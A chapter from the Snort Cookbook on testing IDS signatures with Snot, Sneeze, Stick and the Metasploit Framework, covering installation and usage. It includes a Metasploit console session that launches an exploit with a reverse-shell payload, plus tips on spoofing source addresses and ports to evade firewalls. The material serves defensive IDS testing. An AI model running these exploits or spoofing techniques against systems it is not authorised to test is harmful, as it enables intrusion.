Tools for Testing Signatures

Table of contents:

Problem

You want to test your Snort rules.

Solution

Use Snot to generate traffic based on Snort rules. Snot uses the libnet library for packet generation. However, since Snot has not been updated for a few years, it does not work with the latest libnet package. You must install libnet and Snot with the following commands:

[root@localhost root]# tar zxvf libnet-1.0.2a.tar.gz

[root@localhost root]# cd Libnet-1.0.2a/

[root@localhost Libnet-1.0.2a]# ./configure

[root@localhost Libnet-1.0.2a]# make

[root@localhost Libnet-1.0.2a]# make install

 

[root@localhost root]# tar zxvf snot-0.92a.tar.gz

[root@localhost root]# cd snot-0.92a

[root@localhost snot-0.92a]# make

Sneeze also generates traffic based on Snort rules. It is a Perl script and uses the Net::RawIP Perl module for packet generation. Use the following commands to install Sneeze:

[root@localhost root]# tar xvf sneeze-1.0.tar

[root@localhost root]# cd sneeze

[root@localhost sneeze]# perl -MCPAN -e 'install Net::RawIP'

Stick generates traffic based on Snort rules at a high speed and is used for stress testing an IDS. Use the following to install it:

[root@localhost root]# tar zxvf stick.tgz

[root@localhost root]# cd stick

Next, put your rules in the vision.txt file or use the default rules:

[root@localhost stick]# ./create_stick

The Metasploit Framework is a collection of exploits used for penetration testing, exploit development, and IDS testing. Use the following commands to install the Metasploit Framework:

[root@localhost root]# tar zxvf framework-2.2.tar.gz

[root@localhost root]# cd framework-2.2

[root@localhost framework-2.2]# cd extras

[root@localhost extras]# tar zxvf Term-ReadLine-Gnu-1.14.tar.gz

[root@localhost extras]# cd Term-ReadLine-Gnu-1.14

[root@localhost extras]# perl Makefile.PL

[root@localhost extras]# make

[root@localhost extras]# make install

[root@localhost extras]# cd ..

[root@localhost framework-2.2]# mkdir /usr/local/msf

[root@localhost framework-2.2]# cp -R * /usr/local/msf

[root@localhost framework-2.2]# ln -s /root/framework-2.2/msf* 

/usr/local/bin

 

Discussion

IDS testing is not an exact science. Most of the tools that have been developed generate traffic that will specifically trigger rules. Another method is to just use real attacks. There are several free open source tools that will do both of these things.

Snot generates traffic to trigger Snort rules. It uses Snort rules files as its source of packet information. It also randomizes information that is not contained in the rule to evade detection. It runs on BSD, Linux, and Windows. The following output shows the Snot usage information:

[root@localhost snot-0.92a]# ./snot

Usage: snot -r  [-s ] [-d ]

[-n ] [-l ] [-p]

The -r command-line option and the rule filename are required to generate Snot traffic. The -s command-line option specifies the source IP address or an array of IP addresses. The -d command-line option specifies the destination IP address or an array of IP addresses. The -n command-line option specifies the number of packets to generate. By default, Snot will continue to generate packets infinitely. Setting -n 0 also will generate infinite traffic. The -l command-line option creates a delay between packets. Snot will choose a random number between 1 and the specified delay and sleep for that amount of time between packets. The -p command-line option will disable the random payload generation. This improves signature matching against older, less intelligent IDSes, but also makes Snot detection easier.

The following example generates infinite traffic based on the rules located in the file rule.txt:

[root@localhost snot-0.92a]# ./snot -r ./rule.txt

The following example generates 10 packets based on the rules located in the rule.txt file with the specified source and destination addresses:

[root@localhost snot-0.92a]# ./snot -r ./rule.txt -s 192.168.1.1 -d 

192.168.1.2 -n 10

snot V0.92 (alpha) by sniph (sniph00@yahoo.com)

 

----------------------------------------

Rulefile : ./rule.txt

Source Address : 192.168.1.1

Dest Address : 192.168.1.2

Number of Packets : 10

Delay (max seconds): No Delay

Payloads : Random

----------------------------------------

 

[Parse Rules - Completed parsing 1 rules - Sending now]

 

TCP - "SCAN nmap XMAS" - 192.168.1.1:15100 -> 192.168.1.2:25462

TCP - "SCAN nmap XMAS" - 192.168.1.1:7906 -> 192.168.1.2:58236

TCP - "SCAN nmap XMAS" - 192.168.1.1:65349 -> 192.168.1.2:32368

TCP - "SCAN nmap XMAS" - 192.168.1.1:177 -> 192.168.1.2:8887

TCP - "SCAN nmap XMAS" - 192.168.1.1:63313 -> 192.168.1.2:49610

TCP - "SCAN nmap XMAS" - 192.168.1.1:16311 -> 192.168.1.2:3367

TCP - "SCAN nmap XMAS" - 192.168.1.1:1027 -> 192.168.1.2:53120

TCP - "SCAN nmap XMAS" - 192.168.1.1:60630 -> 192.168.1.2:55688

TCP - "SCAN nmap XMAS" - 192.168.1.1:24748 -> 192.168.1.2:716

TCP - "SCAN nmap XMAS" - 192.168.1.1:32102 -> 192.168.1.2:7636

Sneeze is a traffic generator written in Perl that triggers Snort rules. Like Snot, it also reads Snort rules files and uses them to generate packets. It also has several configurable command-line options. The following output shows the Sneeze usage information:

[root@localhost sneeze]# ./sneeze.pl

Usage ./sneeze.pl -d  -f  [options]

 -c count Loop X times. -1 = = forever. Default is 1.

 -s ip Spoof this IP as source. Default is your IP.

 -p port Force use of this source port.

 -i interface Outbound interface. Default is eth0.

 -x debug Turn on debugging information.

 -h help Duh? This is it.

The following example generates traffic based on the rules contained in the file exploit.rules to the specified destination address:

[root@localhost sneeze]# ./sneeze.pl -d 192.168.1.2 -f /root/snort-2.2.0/rules/exploit.rules

ATTACK:

 192.168.1.1:59937 -> 192.168.1.2:47423

 

ATTACK: EXPLOIT ssh CRC32 overflow /bin/sh

ATTACK TYPE: shellcode-detect

tcp 192.168.1.1:49895 -> 192.168.1.2:22

Reference => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0572

Reference => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0144

Reference => http://www.securityfocus.com/bid/2347

 

ATTACK: EXPLOIT ssh CRC32 overflow NOOP

ATTACK TYPE: shellcode-detect

tcp 192.168.1.1:13246 -> 192.168.1.2:22

Reference => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0572

Reference => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0144

Reference => http://www.securityfocus.com/bid/2347

You can also attempt to avoid firewall rules by using the -s command-line option to spoof a source host, along with the -p option to specify a source port:


[root@localhost sneeze]# ./sneeze.pl -d 192.168.1.2 -f /root/

snort-2.2.0/rules/exploit.rules -s www.something.com -p 53

By default, Sneeze will send each packet one time. You can use the -c command-line option to specify the number of times to loop through the rules file or -1 to loop infinitely:


[root@localhost sneeze]# ./sneeze.pl -d 192.168.1.2 -f /root/

snort-2.2.0/rules/exploit.rules -c 10

[root@localhost sneeze]# ./sneeze.pl -d 192.168.1.2 -f /root/

snort-2.2.0/rules/exploit.rules -c -1

Stick is a traffic generator written in C that uses Snort rules to create packets. It also allows several configurable command-line options. The rules specified in the file vision.txt are executed in a random order at about 250 per second. The following is an example of using Stick in default mode, in which it uses a random source address between 0.0.0.0 and 255.255.255.255 and a destination IP address of 10.0.0.1:

[root@localhost stick]# ./stick

Stress Test - Source target is set to all 2^32 possiblities

Destination target value of: 100000a

 sending rule 975

 sending rule 891

 sending rule 458

 sending rule 538

 sending rule 559

 sending rule 861

The following command-line options are from the Stick README file:

sH xxx.xxx.xxx.xxx This is a single source IP that the IP headers 

 should use as the source.

sC xxx.xxx.xxx.0 This is a single Class C space that has a simple

 random last octet.

sR aaa.aaa.aaa.xxx aaa.aaa.aaa.yyy

 This is a sub class C range!

 ex. ./stick sR 192.168.128.2 192.168.128.55

dH xxx.xxx.xxx.xxx This is a single desination IP for the IP header.

dC xxx.xxx.xxx.0 This is a single Class C space that has a random

 last octet.

dR aaa.aaa.aaa.xxx aaa.aaa.aaa.yyy

 This is a sub class C range!

You can use the Stick command-line parameters, as in the following example, to generate traffic with the specified source and destination IP addresses:

[root@localhost stick]# ./stick sH 192.168.100.10 dH 192.168.200.20

The Metasploit Framework is an advanced open source platform, written in Perl, for developing, testing, and using exploit code. It is used for penetration testing, exploit development, vulnerability research, and IDS and firewall testing. In addition to Perl, it includes other components written in C, assembler, and Python. It runs under most Unix systems, and a customized Cygwin environment is provided for Windows. The Metasploit Framework can be executed by using the command-line interface, console interface, or web interface. The following example shows how to execute an exploit using the console interface:

[root@localhost framework-2.2]# msfconsole

msf > show exploits

 #The installed exploits will be listed.

msf > info blackice_pam_icq

 #Information on the exploit will be displayed.

msf > use blackice_pam_icq

msf blackice_pam_icq > set RHOST 192.168.1.2

RHOST -> 192.168.1.2

msf blackice_pam_icq > set PAYLOAD win32_reverse

PAYLOAD -> win32_reverse

msf blackice_pam_icq(win32_reverse) > set LHOST 192.168.1.1

LHOST -> 192.168.1.1

msf blackice_pam_icq(win32_reverse) > set TARGET 0

TARGET -> 0

msf blackice_pam_icq(win32_reverse) > exploit

[*] Starting Reverse Handler.

 #Status of the exploit will be displayed.

The following example shows how to start the web interface:

[root@localhost framework-2.2]# ./msfweb

[*] Starting Metasploit v2.2 Web Interface on 127.0.0.1:55555...

Once the web server is started, you can open a web browser and enter http://localhost:55555 to execute the interface.

See Also

http://www.stolenshoes.net/sniph/index.html

http://www.packetfactory.net/projects/libnet/

http://snort.sourceforge.net/sneeze-1.0.tar

http://www.securityfocus.com/tools/1974

http://www.metasploit.com/projects/Framework/

Snot README

Stick README

Sneeze README

Analyzing and Graphing Logs

Installing Snort from Source on Unix

Logging to a File Quickly

How to Build Rules

Detecting Stateless Attacks and Stream Reassembly

Managing Snort Sensors

Generating Statistical Output from Snort Logs

Monitoring Network Performance

Index



Snort Cookbook
Snort Cookbook
ISBN: 0596007914
EAN: 2147483647
Year: 2006
Pages: 167

Flylib.com © 2008-2020.
If you may any questions please contact us: flylib@qtcs.net